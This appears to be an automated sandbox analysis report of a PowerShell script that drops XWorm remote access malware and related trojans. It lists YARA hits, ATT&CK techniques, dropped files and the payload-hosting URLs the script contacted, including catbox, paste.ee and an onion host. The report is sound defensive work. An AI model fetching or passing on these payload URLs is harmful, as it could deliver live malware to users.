Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\SVrB5SO0.exe	Queries volume information: C:\ProgramData\SVrB5SO0.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\config.json VolumeInformation

Source: C:\Windows\System32\dllhost.exe

Code function: 20_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

20_2_0000000140002300

Source: C:\Windows\System32\notepad.exe

Code function: 2_2_000001CB53E67D90 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

2_2_000001CB53E67D90

Source: C:\ProgramData\j3owB.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: dllhost.exe

Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 15.0.SVrB5SO0.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.1281920599.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1350767206.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1350767206.0000000005225000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SVrB5SO0.exe PID: 7512, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\SVrB5SO0.exe, type: DROPPED

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 15.0.SVrB5SO0.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.1281920599.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1350767206.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1350767206.0000000005225000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SVrB5SO0.exe PID: 7512, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\SVrB5SO0.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	813 Process Injection	1 Obfuscated Files or Information	Security Account Manager	34 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	1 Scheduled Task/Job	3 Software Packing	NTDS	241 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	1 Proxy	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Rootkit	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	41 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	813 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Files and Directories	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
script.ps1	0%	Virustotal		Browse
script.ps1	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\SVrB5SO0.exe	100%	Avira	HEUR/AGEN.1305769
C:\ProgramData\j3owB.exe	100%	Avira	RKIT/Agent.jcceq
C:\ProgramData\cZp98.exe	100%	Avira	TR/Dropper.MSIL.Gen
C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	100%	Avira	RKIT/Agent.jcceq
C:\ProgramData\cZp98.exe	88%	ReversingLabs	ByteCode-MSIL.Infostealer.Tinba
C:\ProgramData\j3owB.exe	90%	ReversingLabs	Win32.Trojan.Heracles
C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	67%	ReversingLabs	ByteCode-MSIL.Trojan.Heracles

Source	Detection	Scanner	Label
https://files.catbox.m	0%	Avira URL Cloud	safe
http://crl.microsoft9%x	0%	Avira URL Cloud	safe
https://files.catbox.moeD	0%	Avira URL Cloud	safe
https://files.catb	0%	Avira URL Cloud	safe
https://files.catbox.moe;	0%	Avira URL Cloud	safe
http://schemas.mDeU	0%	Avira URL Cloud	safe
https://files.catbo	0%	Avira URL Cloud	safe
https://files.catbox.	0%	Avira URL Cloud	safe
https://i.ibb.coX	0%	Avira URL Cloud	safe
https://files.catbox	0%	Avira URL Cloud	safe
https://files.cat	0%	Avira URL Cloud	safe
http://www.blackhost.xyz	0%	Avira URL Cloud	safe
https://www.blackhost.xyz/srv/fu	0%	Avira URL Cloud	safe
https://files.catbox.mo	0%	Avira URL Cloud	safe
https://www.blackhost.xyz/srv/fup/uploads/DRGDF.HGFG	0%	Avira URL Cloud	safe
https://files.c	0%	Avira URL Cloud	safe
https://www.blackhost.xyz	0%	Avira URL Cloud	safe
https://files.ca	0%	Avira URL Cloud	safe
http://www.microsoft.coqQ	0%	Avira URL Cloud	safe
https://blackhost7pws76u6vohksdahnm6adf7riukgcmahrwt43wv2drvyxid.onion/srv/fup/uploads/DRGDF.HGFG	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
files.catbox.moe	108.181.20.35	true	false	high
paste.ee	23.186.113.60	true	false	high
www.blackhost.xyz	2.238.145.99	true	true	unknown
i.ibb.co	91.134.82.79	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://files.catbox.moe/cfuoi8.fuk	false		high
127.0.0.1	false		high
https://www.blackhost.xyz/srv/fup/uploads/DRGDF.HGFG	false	Avira URL Cloud: safe	unknown
https://i.ibb.co/Dwrj41N/Image.png	false		high
https://paste.ee/d/linhgh7d	false		high
https://files.catbox.moe/n8nug3.fuck	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.microsoft9%x	powershell.exe, 00000003.00000002.1368155002.0000000007488000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://files.catbox.	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000011.00000002.1436533880.0000026A59F97000.00000004.00000800.00020000.00000000.sdmp	false		high
https://analytics.paste.ee	powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.4.dr	false		high
https://paste.ee	powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6	powershell.exe, 00000000.00000002.1381131314.0000000005439000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.mDeU	cZp98.exe, 00000010.00000002.1318785193.0000000001085000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 00000016.00000000.1355628623.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2C:	Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	false		high
https://files.catbox.m	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://files.catbox.moe;	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000005230000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/Prod.C:	edb.log.4.dr	false		high
https://www.google.com	powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.catbox.moe/n8n	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 00000016.00000002.2435366666.000002D6CDC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1355628623.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1355663816.000002D6CDC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2	Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	false		high
https://files.catbo	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://files.catbox.moe/cfuoi8.	powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.catbox.moe/n8nug3.fuck$M	powershell.exe, 00000003.00000002.1350767206.0000000005230000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i.ibb.co	SVrB5SO0.exe, 0000000F.00000002.2458610263.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, SVrB5SO0.exe, 0000000F.00000002.2458610263.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000000.00000002.1381131314.0000000005428000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1243180713.00000000049F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.catb	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000011.00000002.1436533880.0000026A59F97000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.1360704931.00000000059FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1247032360.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1436533880.0000026A59F97000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.catbox	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com	powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.catbox.moe	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000005230000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 00000016.00000002.2435366666.000002D6CDC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1355663816.000002D6CDC4E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 00000016.00000000.1355628623.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.catbox.moe/n8nug3	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1381131314.00000000053FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1243180713.00000000049F1000.00000004.00000800.00020000.00000000.sdmp, SVrB5SO0.exe, 0000000F.00000002.2458610263.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1357130417.0000026A49F21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	false		high
https://i.ibb.coX	SVrB5SO0.exe, 0000000F.00000002.2458610263.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://files.catbox.moeD	powershell.exe, 00000003.00000002.1350767206.0000000005230000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
